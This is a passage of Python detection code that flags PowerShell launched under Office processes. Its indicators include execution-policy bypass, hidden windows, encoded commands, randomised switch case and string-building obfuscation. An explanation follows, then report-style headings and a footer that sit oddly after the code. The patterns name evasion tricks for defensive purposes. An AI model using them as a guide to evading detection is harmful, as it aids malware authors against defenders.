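    {"pid": 3376, "ppid": 3348, "image": PS_IMAGE, "cmdline": PS_CMD},
    {"pid": 4100, "ppid": 2948, "image": PS_IMAGE,                                              # benign control
     "cmdline": r"powershell.exe -NoProfile -ExecutionPolicy RemoteSigned -File C:\scripts\inventory.ps1"},
]


def image_name(path):
    return re.split(r"[\\/]", path)[-1].lower()


def parse_switches(cmdline):
    """Resolve switch abbreviations like the console host: a token matches the first
    switch it is a case-insensitive prefix of, if it is at least the minimum length.
    Returns ({switch: value-or-True}, [(raw token, switch)]); stops at the first
    positional token, which is the script body when -Command is omitted."""
    toks = cmdline.split()
    found, matched, i = {}, [], 1                      # toks[0] is the image
    while i < len(toks) and toks[i][0] in "-/":
        key = toks[i][1:]
        name = ALIASES.get(key.lower())
        if name is None:
            for cand, minimum, _ in SWITCHES:
                if len(key) >= len(minimum) and cand.lower().startswith(key.lower()):
                    name = cand
                    break
        if name is None:
            found[key] = None                          # unknown switch, keep it visible
        else:
            matched.append((key, name))
            takes_value = dict((n, v) for n, _, v in SWITCHES)[name]
            if takes_value and i + 1 < len(toks):
                i += 1
                found[name] = toks[i]
            else:
                found[name] = True
        i += 1
    return found, matched


def indicators(event, by_pid):
    ind = []
    anc, seen = by_pid.get(event["ppid"]), set()
    while anc is not None and anc["pid"] not in seen:  # walk up through cmd.exe etc.
        seen.add(anc["pid"])
        if image_name(anc["image"]) in OFFICE:
            ind.append("office_ancestor")
            break
        anc = by_pid.get(anc["ppid"])
    cmd = event["cmdline"]
    switches, matched = parse_switches(cmd)
    if str(switches.get("ExecutionPolicy", "")).lower() in {"bypass", "unrestricted"}:
        ind.append("executionpolicy_bypass")
    if str(switches.get("WindowStyle", "")).lower() == "hidden":
        ind.append("window_hidden")
    if "EncodedCommand" in switches:
        ind.append("encoded_command")
    # Randomised case: token is neither all-lower/upper nor spelled as PowerShell does.
    if any(not (name.startswith(tok) or tok.islower() or tok.isupper()) for tok, name in matched):
        ind.append("randomised_case")
    if re.search(r"'[^']*\{\d+\}[^']*'\s*-f\s*'", cmd):
        ind.append("format_operator_string_building")  # '{1}{0}' -f 'b','a'
    if re.search(r"'[^']*'\s*\+\s*'[^']*'", cmd):
        ind.append("string_concatenation")             # 'dow'+'nload'
    return ind


def evaluate(events, min_hits=3):
    """{pid: indicators} for PowerShell launches under an Office ancestor with at
    least min_hits indicators in total."""
    by_pid = {e["pid"]: e for e in events}
    hits = {}
    for e in events:
        if image_name(e["image"]) not in SHELLS:
            continue
        ind = indicators(e, by_pid)
        if "office_ancestor" in ind and len(ind) >= min_hits:
            hits[e["pid"]] = ind
    return hits


if __name__ == "__main__":
    for pid, ind in evaluate(EVENTS).items():
        print(pid, ind)
```

The ancestor walk matters: the Office process is the grandparent here, so a rule keyed only on the direct parent of powershell.exe would miss this chain. Normalising switches before matching also means a rule on "ExecutionPolicy Bypass" fires on -exeCuTi ByPASS, -ep bypass and -ex bypass alike.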
Registry Activities: none recorded for this process.
Disassembly
Code Analysis
Copyright Joe Security LLC 2018 Page 23 of 23